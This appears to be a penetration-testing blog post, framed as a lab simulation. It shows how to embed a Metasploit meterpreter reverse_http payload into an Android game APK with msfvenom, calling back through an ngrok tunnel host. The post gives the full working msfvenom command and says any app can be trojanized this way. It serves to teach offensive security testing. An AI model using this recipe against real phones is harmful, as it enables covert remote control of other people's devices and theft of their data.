Over the WAN simulation - hacking into an Android phone with NGROK and Metasploit

This video is another "over the WAN" hacking simulation. This time we will use Kali Linux together with NGROK, Metasploit and reverse_http payload to hack into an Android phone.
The test LG G2 Android phone will be connected to Internet via 4G.

This video uses information that was presented into my previous posts. Please review the posts below, as needed:

1. Over the WAN Penetration Testing LAB - Installing and using NGROK and NETCAT

2. MS17-010 Vulnerability - Over the WAN LAB with NGROK - EternalBlue and EternalRomance exploits on Windows 10, Windows 7 and Windows 2018 R2

3. Metasploit Tips - reverse_https vs reverse_tcp payloads (also covers the "multihandler" exploit)

4. Generating shellcode - using msfvenom to generate a binary payload

Android application

The Android application used in this video was downloaded from:
https://apkpure.com/roll-balls-into-a-hole/com.andregal.android.billard

This application was randomly chosen. Any other application can be used instead.

Extra modules

In order to successfully run "msfvenom", additional modules need to be installed on the Kali Linux computer. Use the command below to install the required modules:

apt-get install lib32stdc++6 lib32ncurses5 lib32z1 apktool zipalign

MSFVENOM

The following "msfvenom" command was used to embed the "reverse_http" payload into the application code:

msfvenom -x RollBalls.apk -p android/meterpreter/reverse_http LHOST=0.tcp.ngrok.io LPORT=15065 -o RollBallsB.apk

Check the "msfvenom" options in the picture below:


Over the WAN simulation - hacking into an Android phone with NGROK and Metasploit



Comments

Popular Posts

MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit

Generating shellcode - using msfvenom to generate a binary payload

MS17-010 Vulnerability - Scanning using Metasploit on KALI Linux